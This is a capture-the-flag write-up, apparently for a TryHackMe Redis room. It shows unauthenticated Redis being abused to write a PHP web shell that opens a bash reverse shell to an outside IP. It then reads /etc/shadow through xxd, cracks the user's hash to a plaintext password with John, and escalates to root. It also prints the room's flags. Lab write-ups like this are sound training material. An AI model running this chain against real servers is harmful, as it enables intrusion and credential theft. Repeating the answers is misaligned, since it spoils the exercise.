1. Scan the machine, how many ports are open?

Ans: 2

2. What’s is the database management system installed on the server?

Ans: redis

3. What port is the database management system running on?

Ans: 6379

4. What’s is the version of management system installed on the server?

Ans: 6.0.7

5. Compromise the machine and locate user.txt

Let’s Connect with redis-cli using the below syntax

redis-cli -h <Machine-IP>

We found a Username — vianka, so let’s Enumerate Further

1. Let’s try to Upload a Reverse Shell using the Following Commands inside the redis-cli

config set dir /var/www/html
config set dbfilename shell.php
set test "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.11.36.171/4444 0>&1'\"); ?>"
save

2. Now, let’s start a netcat listener using the Following Command

nc -lvp 4444

3. Then Navigate to http://<Machine-IP>/shell.php

Ans: thm{red1s_rce_w1thout_credent1als} 

6. What is the local user account password?

On Analysing GTFObins we found a binary to read files with sudo permissions,

1. So let’s first make our shell interactive with the python command
2. Then we try to read /etc/shadow file using the Following Commands

$ python3 -c "import pty; pty.spawn('/bin/bash')"
$ LFILE=/etc/shadow 
$ /usr/bin/xxd "$LFILE" | /usr/bin/xxd -r
root:!:18507:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18506:0:99999:7:::
uuidd:*:18506:0:99999:7:::
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::

3. Now copy and store the hash of vianka into a file named hash.txt in your system. (Make sure to check the hash if you paste the hash via the terminal)

4. Now Let’s use john to crack the password using the below command

$ john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
beautiful1       (vianka)     
Session completed.

Ans: beautiful1

7. Escalate privileges and obtain root.txt

1. Now Let’s Login as vianka with her password beautiful1 using the command su vianka and let’s check what commands vianka can run

2. She can run all commands so lets sudo it

sudo su
cat /root/root.txt

Ans: thm{xxd_pr1v_escalat1on}